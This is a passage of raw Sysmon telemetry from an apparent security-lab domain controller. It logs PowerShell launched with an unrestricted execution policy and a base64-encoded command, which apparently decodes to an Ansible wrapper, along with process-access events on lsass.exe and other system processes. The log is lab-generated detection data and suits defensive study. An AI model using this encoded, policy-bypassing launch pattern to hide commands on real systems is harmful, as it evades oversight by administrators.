CkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000003341Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.913{10ACEC4A-857E-5FCF-A000-000000009101}1976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ugdo1hjh.cmdline2020-12-08 13:54:06.913 11241100x80000000000000003340Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:06.913{10ACEC4A-857E-5FCF-A000-000000009101}1976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ugdo1hjh.dll2020-12-08 13:54:06.913 10341000x80000000000000003339Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.445{10ACEC4A-857E-5FCF-9D00-000000009101}49404980C:\Windows\system32\conhost.exe{10ACEC4A-857E-5FCF-A100-000000009101}2228C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003338Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.445{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003337Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.445{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003336Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.445{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003335Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.445{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003334Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.445{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003333Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.445{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003332Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.445{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003331Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.445{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003330Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.445{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003329Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.445{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-857E-5FCF-A100-000000009101}2228C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003328Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.445{10ACEC4A-857E-5FCF-A000-000000009101}19764100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-857E-5FCF-A100-000000009101}2228C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+2a85c02b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+29cfcc35|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+29cfc906|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+2a7ae1eb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+29cbd49c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+29d1b96b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+29cfefd0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+29cfefd0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+29cfee61|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+29cf0de6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+29cfd319|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+29cfcf0c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+29cfcc35|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+29cfc906|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+2a7ae1eb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+29ce3767|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+29ce2d37 154100x80000000000000003327Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.454{10ACEC4A-857E-5FCF-A100-000000009101}2228C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-857E-5FCF-ED48-060000000000}0x648ed0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{10ACEC4A-857E-5FCF-A000-000000009101}1976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000003326Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.430{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003325Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.430{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003324Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.430{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003323Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.383{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-857E-5FCF-A000-000000009101}1976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003322Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.383{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-857E-5FCF-A000-000000009101}1976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003321Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.352{10ACEC4A-857E-5FCF-A000-000000009101}1976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_2m4rofov.rtf.ps12020-12-08 13:54:06.352 10341000x80000000000000003320Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.336{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-857E-5FCF-A000-000000009101}1976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003319Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.320{10ACEC4A-857E-5FCF-9D00-000000009101}49404980C:\Windows\system32\conhost.exe{10ACEC4A-857E-5FCF-A000-000000009101}1976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003318Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 